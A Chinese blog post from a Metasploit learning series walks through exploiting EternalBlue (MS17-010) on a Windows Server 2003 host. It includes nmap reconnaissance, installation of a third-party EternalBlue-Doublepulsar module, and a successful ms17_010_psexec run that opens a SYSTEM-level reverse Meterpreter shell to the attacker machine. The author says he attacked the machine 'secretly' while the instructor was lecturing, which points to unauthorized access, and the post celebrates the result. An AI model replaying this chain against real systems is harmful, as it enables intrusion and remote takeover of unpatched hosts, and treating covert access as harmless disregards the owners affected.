metasploit学习之路(四)记一次实战--永恒之蓝(MS017-010)
在我的metasploit的学习博客中,也算是实操的一篇,可以对使用流程和一些必要的命令进行学习。
永恒之蓝这个漏洞我没有复现过,但是这一次偶然的机会玩了一把。
大佬在讲台上面传授经验,用的是windows server 2003,于是我偷偷玩了一把,下面说下流程。
1、首先nmap扫描:
msf5 > nmap -sS -sV -A -O -v 10.1.2.217
[*] exec: nmap -sS -sV -A -O -v 10.1.2.217
………… //中间过程省略
Nmap scan report for 10.1.2.217
Host is up (0.00099s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
81/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: \xBD\xA8\xC9\xE8\xD6\xD0
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unkown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Sat, 13 Jul 2019 05:24:02 GMT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 3790 Service Pack 2 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Service
MAC Address: 00:1C:42:E3:BA:AE (Parallels)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
Host script results:
|_clock-skew: mean: -4h00m00s, deviation: 5h39m23s, median: -7h59m59s
| nbstat: NetBIOS name: RCSECAFB4, NetBIOS user: , NetBIOS MAC: 00:1c:42:e3:ba:ae (Parallels)
| Names:
| RCSECAFB4<00> Flags:
| WORKGROUP<00> Flags:
| RCSECAFB4<20> Flags:
| WORKGROUP<1e> Flags:
| WORKGROUP<1d> Flags:
|_ \x01\x02__MSBROWSE__\x02<01> Flags:
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
| Computer name: rcsecafb4
| NetBIOS computer name: RCSECAFB4\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-13T13:24:03+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default) //最下面是关于smb的分析,看到这里有dengerous的提示
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.99 ms 10.1.2.217
NSE: Script Post-scanning.
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.53 seconds
Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.246KB)
于是开始使用msf尝试smb的漏洞。
2、msf找smb漏洞利用组件
msf5>search smb //搜索到好多,不列出来了就,偶尔看到了永恒之蓝,于是先试一试
58 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
103 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
104 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
105 exploit/windows/smb/ms17_010_psexec
先是用exploit/windows/smb/ms17_010_eternalblue这个打了一下,没有成功,于是网上查了相关方法,找到了这个利用脚本:git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
下载之后,把脚本挪到msf里
cp eternalblue_doublepulsar.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
然后在msf中使用命令reload_all,重新加载所有组件,然后再search:
msf5 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_doublepulsar normal No EternalBlue
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
这样就看到我们复制进去的eternalblue_doublepulsar了(我给他重命名了ms17_010_eternalblue_doublepulsar)。
这个脚本是需要使用wine的,因为我们git下来之后里面有个deps文件夹,要使用到里面的exe文件,apt-get install wine32下载wine32,然后wine cmd.exe初次进入一下,初始化一些文件,然后就可以接着来了。
下面的流程:
msf5 > use exploit/windows/smb/ms17_010_eternalblue_doublepulsar
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > set RHOSTS 10.1.2.145
RHOSTS => 10.1.2.145
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOSTS 10.1.2.145 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
1 Windows Server 2003 SP0 (x86)
2 Windows Server 2003 SP1/SP2 (x86)
3 Windows Server 2003 (x64)
4 Windows Vista (x86)
5 Windows Vista (x64)
6 Windows Server 2008 (x86)
7 Windows Server 2008 R2 (x86) (x64)
8 Windows 7 (all services pack) (x86) (x64)
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > set target 2
target => 2
DOUBLEPULSARPATH 和 ETERNALBLUEPATH 就是要使用deps中的文件,根据你文件的位置设置路径即可,RHOST和target也设置好。
然后就exploit了:
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 10.1.2.245:4444
[*] 10.1.2.145:445 - Generating Eternalblue XML data
[*] 10.1.2.145:445 - Generating Doublepulsar XML data
[*] 10.1.2.145:445 - Generating payload DLL for Doublepulsar
[*] 10.1.2.145:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.1.2.145:445 - Launching Eternalblue...
[+] 10.1.2.145:445 - Backdoor is already installed
[*] 10.1.2.145:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 10.1.2.145:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
然而失败了,这个脚本我看网上还挺多人用的,但我这没成功。。。又试了两次之后打算试试别的攻击脚本。
前面已经试了两个脚本了,现在还剩下两个,一个是用于win8+的,于是试了剩下的一个:
msf5 exploit(windows/smb/ms17_010_eternalblue_doublepulsar) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.1.2.217
RHOSTS => 10.1.2.217
msf5 exploit(windows/smb/ms17_010_psexec) > check
[+] 10.1.2.217:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[+] 10.1.2.217:445 - The target is vulnerable.
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.1.2.245:4444
[*] 10.1.2.217:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 10.1.2.217:445 - Filling barrel with fish... done
[*] 10.1.2.217:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.1.2.217:445 - [*] Preparing dynamite...
[*] 10.1.2.217:445 - Trying stick 1 (x64)...Miss
[*] 10.1.2.217:445 - [*] Trying stick 2 (x86)...Boom!
[*] 10.1.2.217:445 - [+] Successfully Leaked Transaction!
[*] 10.1.2.217:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.1.2.217:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.1.2.217:445 - Reading from CONNECTION struct at: 0x85140d48
[*] 10.1.2.217:445 - Built a write-what-where primitive...
[+] 10.1.2.217:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.1.2.217:445 - Selecting native target
[*] 10.1.2.217:445 - Uploading payload... UXPYZPkd.exe
[*] 10.1.2.217:445 - Created \UXPYZPkd.exe...
[+] 10.1.2.217:445 - Service started successfully...
[*] 10.1.2.217:445 - Deleting \UXPYZPkd.exe...
[*] Sending stage (179779 bytes) to 10.1.2.217
[*] Meterpreter session 1 opened (10.1.2.245:4444 -> 10.1.2.217:1027) at 2019-07-13 13:32:03 +0800
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Parallels Ethernet Adapter #2
Hardware MAC : 00:1c:42:ac:32:68
MTU : 1500
IPv4 Address : 10.211.55.16
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Parallels Ethernet Adapter
Hardware MAC : 00:1c:42:e3:ba:ae
MTU : 1500
IPv4 Address : 10.1.2.217
IPv4 Netmask : 255.255.255.0
成功拿下,yes